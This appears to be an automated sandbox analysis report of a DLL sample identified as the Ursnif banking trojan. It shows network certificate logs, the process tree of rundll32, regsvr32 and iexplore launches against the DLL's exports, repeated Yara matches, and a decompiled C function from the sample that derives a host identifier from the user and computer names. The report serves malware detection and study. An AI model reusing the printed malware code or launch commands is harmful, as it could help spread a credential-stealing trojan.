                                                        Jul 27, 2021 10:55:50.663324118 CEST151.101.1.44443192.168.2.349756CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                        Jul 27, 2021 10:55:50.664096117 CEST151.101.1.44443192.168.2.349758CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                        Jul 27, 2021 10:55:50.710814953 CEST151.101.1.44443192.168.2.349754CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030

                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: loaddll32.exe PID: 1112 Parent PID: 5680

                                                        General

                                                        Start time:10:55:36
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\System32\loaddll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\direction.dll'
                                                        Imagebase:0x3f0000
                                                        File size:116736 bytes
                                                        MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452882755.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452739993.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452599143.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452682864.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452790659.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452941227.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.485787977.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452547670.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452911252.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 3492 Parent PID: 1112

                                                        General

                                                        Start time:10:55:36
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
                                                        Imagebase:0xbd0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: regsvr32.exe PID: 3484 Parent PID: 1112

                                                        General

                                                        Start time:10:55:37
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\direction.dll
                                                        Imagebase:0x340000
                                                        File size:20992 bytes
                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.299067540.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.299293489.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.299402333.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.298617487.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.299506180.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.487540264.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.298330099.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.298892521.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.298800751.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 6096 Parent PID: 3492

                                                        General

                                                        Start time:10:55:37
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311524136.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311353638.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.488281426.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311162481.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310218293.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310401449.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310585045.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310811687.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311655737.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: iexplore.exe PID: 4876 Parent PID: 1112

                                                        General

                                                        Start time:10:55:37
                                                        Start date:27/07/2021
                                                        Path:C:\Program Files\internet explorer\iexplore.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                        Imagebase:0x7ff6f8980000
                                                        File size:823560 bytes
                                                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 2788 Parent PID: 1112

                                                        General

                                                        Start time:10:55:38
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Opisthotonos
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: iexplore.exe PID: 2412 Parent PID: 4876

                                                        General

                                                        Start time:10:55:38
                                                        Start date:27/07/2021
                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17410 /prefetch:2
                                                        Imagebase:0xdb0000
                                                        File size:822536 bytes
                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 5496 Parent PID: 1112

                                                        General

                                                        Start time:10:55:41
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Hydrazo
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 6132 Parent PID: 1112

                                                        General

                                                        Start time:10:55:45
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Overlock
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 3340 Parent PID: 1112

                                                        General

                                                        Start time:10:55:49
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Automobilist
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 3164 Parent PID: 1112

                                                        General

                                                        Start time:10:55:54
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Swampland
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 6044 Parent PID: 1112

                                                        General

                                                        Start time:10:55:58
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Subarachnoid
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 5776 Parent PID: 1112

                                                        General

                                                        Start time:10:56:02
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Bechained
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 6220 Parent PID: 1112

                                                        General

                                                        Start time:10:56:07
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Unforeseenness
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 6408 Parent PID: 1112

                                                        General

                                                        Start time:10:56:11
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Incrimination
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: iexplore.exe PID: 6436 Parent PID: 4876

                                                        General

                                                        Start time:10:56:12
                                                        Start date:27/07/2021
                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82950 /prefetch:2
                                                        Imagebase:0xdb0000
                                                        File size:822536 bytes
                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 6648 Parent PID: 1112

                                                        General

                                                        Start time:10:56:17
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Oversystematic
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: iexplore.exe PID: 6692 Parent PID: 4876

                                                        General

                                                        Start time:10:56:18
                                                        Start date:27/07/2021
                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17432 /prefetch:2
                                                        Imagebase:0xdb0000
                                                        File size:822536 bytes
                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 6912 Parent PID: 1112

                                                        General

                                                        Start time:10:56:21
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Shieldless
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.378625315.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.379329065.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.377754049.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.379402147.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.378397913.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.377966823.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.379198024.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000002.457353583.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.379544002.0000000007038000.00000004.00000040.sdmp, Author: Joe Security

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 7148 Parent PID: 1112

                                                        General

                                                        Start time:10:56:26
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Tsarevitch
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353519210.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353381101.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353640605.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353482543.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353420356.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353660162.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353285218.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000002.442237673.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353559736.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 1752 Parent PID: 1112

                                                        General

                                                        Start time:10:56:31
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Torchbearer
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349169873.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349379368.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349425307.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349209886.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349342259.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349245069.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349275169.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349118555.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.401300061.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 6008 Parent PID: 1112

                                                        General

                                                        Start time:10:56:34
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Moler
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: rundll32.exe PID: 6468 Parent PID: 1112

                                                        General

                                                        Start time:10:56:38
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Hyperpigmented
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.377493351.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.377965158.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.425611899.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.376670409.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.377140325.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.377030195.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.376078643.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.377890073.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.376494826.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security

                                                        Chronological Activities

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

                                                          Analysis Process: loaddll32.exe PID: 1112 Parent PID: 5680 loaddll32.exeCOMMON

                                                          Executed Functions

                                                          Function 005E9135, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E005E9135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x5ed270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E005EA6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x5ed2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x5ed238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E005E7306(_v8 + _v8, _t64);
							}
							HeapFree( *0x5ed238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x5ed238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E005E7306(_v8 + _v8, _t64);
						}
						HeapFree( *0x5ed238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                          0x005e9135
                                                          0x005e913d
                                                          0x005e9141
                                                          0x005e9144
                                                          0x005e9149
                                                          0x005e914b
                                                          0x005e9150
                                                          0x005e9150
                                                          0x005e9156
                                                          0x005e9158
                                                          0x005e9165
